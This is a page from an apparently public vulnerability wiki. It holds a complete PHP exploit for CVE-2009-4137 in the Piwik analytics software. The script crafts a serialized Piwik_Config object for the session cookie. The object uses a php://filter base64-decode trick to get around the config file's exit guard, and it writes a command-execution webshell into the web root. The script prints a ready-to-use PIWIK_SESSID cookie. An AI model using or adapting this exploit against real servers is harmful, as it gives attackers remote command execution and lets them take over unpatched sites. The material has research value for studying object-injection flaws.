Free, open, anyone-can-edit vulnerability database -- pwnwiki.com
EXP
<?php
/*
 * Exploit for CVE-2009-4137 (Piwik): PHP object injection of a Piwik_Config
 * object via the unserialized session cookie.
 *
 * The __destruct() method of Piwik_Config writes the configuration to the
 * path held in the pathIniFileUserConfig property. Every config file it
 * writes starts with a PHP "showstopper", see these two lines of Config.php:
 *
 *   $configFile  = "; <?php exit; ?> DO NOT REMOVE THIS LINE\n";
 *   $configFile .= "; file automatically generated or modified by Piwik; you can manually override the default values in global.ini.php by redefining them in this file.\n";
 *
 * To get around it we write through php://filter/write=convert.base64-decode
 * and pre-encode the payload. PHP skips every character that is not part of
 * the base64 alphabet, so the preamble decodes to garbage rather than
 * aborting the write. We prepend a single character ('a') to fix the 4-char
 * alignment of the preamble, then our base64-encoded webshell follows.
 *
 * A request to the Piwik server carrying the cookie triggers the exploit.
 * If you send the request by hand, URL-encode the cookie value: the '+' and
 * '/' characters of the base64 alphabet must be encoded.
 */

class Zend_Config {
    protected $_data = array(
        "login"    => "root",
        "password" => "rootroot",
        "email"    => "email protected"   // value is irrelevant to the exploit
    );
}

class Piwik_Config {
    protected $configFileUpdated      = true;
    protected $doWriteFileWhenUpdated = true;
    protected $correctCwd             = ".";
    // Write target: base64-decode filter in front of the webroot path
    protected $pathIniFileUserConfig  = "php://filter/write=convert.base64-decode/resource=/var/www/piwik/webshell.php";
    protected $userConfig             = array();

    function __construct() {
        // The section name carries the payload; 'a' is for padding so that the
        // payload starts on a 4-character base64 boundary after the preamble.
        $this->userConfig["a" . base64_encode('<?php system($_GET[\'cmd\']); ?>' . "\n")] = new Zend_Config;
    }
}

$b64        = base64_encode(serialize(new Piwik_Config));
$urlEncoded = urlencode($b64);
echo "Use this cookie:\n";
echo "PIWIK_SESSID=" . $urlEncoded . "\n";
?>